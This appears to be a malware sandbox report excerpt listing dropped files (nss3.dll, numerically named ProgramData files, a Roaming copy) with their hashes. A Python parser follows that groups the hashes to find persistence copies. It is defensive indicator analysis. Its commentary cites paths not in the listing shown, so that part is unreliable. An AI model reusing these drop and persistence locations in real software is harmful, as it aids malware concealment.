| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
| SHA512 | 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/3488-734-0x0000000000400000-0x0000000000472000-memory.dmp
memory/5108-867-0x0000000000400000-0x0000000000472000-memory.dmp
memory/3336-869-0x0000000000400000-0x0000000000472000-memory.dmp
memory/5016-871-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2172-873-0x0000000004A10000-0x0000000004A20000-memory.dmp
memory/1480-878-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Roaming\bjvcisv
| MD5 | 370715cbf360374ed76a4bc573b17d94 |
| SHA1 | 0c3e6c87488f85b865c8fe3e4c5c284d188efe1b |
| SHA256 | 678abbc0095adbd4db39e537c84066c6023927e2c13cc359bae58cc742243e99 |
| SHA512 | 167511123d38e4bb23ac7ede911b9fd306740b43707b30a49d110dbae1776eed4b1ac419a415fd506a6cadc92187574f4db64a5888c63150e31883754dfaae70 |
C:\ProgramData\02480846926978705807305974
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\ProgramData\72480087176324592609761508
| MD5 | b133605a69c0c42d03bb7e5020b86258 |
| SHA1 | ad8bb42ba6411cf8df977b47f2dbed7d4a214a0f |
| SHA256 | f0c9146c1d86eac1962b0722ccf051e8783c1e8977380cba1ce366a41861d20a |
| SHA512 | 2f32b79eccb10f524e82eab7301630a504046075a066b0383cb546b7569d2b558a4db45a9ca6743f969e9bf970896e7e0df6cc9f214542527c8bb9e0f323e15c |
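The listing above repeats the same hashes under different paths (7420.exe and the Roaming\bjvcisv copy, build3.exe and the Roaming\Microsoft\Network\mstsca.exe copy), which is the detail an analyst wants pulled out: one payload, several drop locations, usually a persistence copy. The following parser is an added example and not part of the sandbox report; the function names are my own, and the embedded sample is a constructed subset of the entries shown above in the report's own layout (a path line, then one `| ALGO | hex |` row per hash, with memory-dump lines interleaved). It groups paths by SHA256 and reports any hash written to more than one location.

```python
"""Parse a sandbox dropped-file listing into IOC records grouped by SHA256.

Added example, not part of the original report. Hash rows attach to the
most recent path line; memory-dump lines are skipped because they carry
no file hash; a hash whose hex length does not match its algorithm is
rejected rather than silently kept.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the entries from the listing above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\7420.exe
| MD5 | 370715cbf360374ed76a4bc573b17d94 |
| SHA1 | 0c3e6c87488f85b865c8fe3e4c5c284d188efe1b |
| SHA256 | 678abbc0095adbd4db39e537c84066c6023927e2c13cc359bae58cc742243e99 |
memory/4372-330-0x0000000003220000-0x000000000338E000-memory.dmp
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build3.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
C:\Users\Admin\AppData\Roaming\bjvcisv
| MD5 | 370715cbf360374ed76a4bc573b17d94 |
| SHA256 | 678abbc0095adbd4db39e537c84066c6023927e2c13cc359bae58cc742243e99 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_dropped_files(text):
    """Return a list of {'path': ..., 'MD5': ..., 'SHA256': ...} records."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:
                raise ValueError("hash row before any path line")
            algo, value = m.group(1), m.group(2).lower()
            if len(value) != HASH_LEN[algo]:
                raise ValueError(f"bad {algo} length on {current['path']!r}")
            current[algo] = value
            continue
        if line.startswith("memory/"):
            continue  # memory-dump entries carry no file hash
        current = {"path": line}  # any other line starts a new file record
        records.append(current)
    return records


def group_by_sha256(records):
    """Map SHA256 -> sorted, de-duplicated list of paths it was dropped to."""
    groups = defaultdict(set)
    for rec in records:
        if "SHA256" in rec:
            groups[rec["SHA256"]].add(rec["path"])
    return {h: sorted(p) for h, p in groups.items()}


def multi_location_payloads(records):
    """SHA256 values written under more than one path (likely persistence copies)."""
    return {h: paths for h, paths in group_by_sha256(records).items() if len(paths) > 1}


if __name__ == "__main__":
    for sha, paths in multi_location_payloads(parse_dropped_files(SAMPLE)).items():
        print(sha)
        for p in paths:
            print("   ", p)
```

Feeding the whole listing through `parse_dropped_files` gives one record per path line; `multi_location_payloads` is the set worth turning into file-path plus hash detections, since the second location is where the malware expects to survive a reboot.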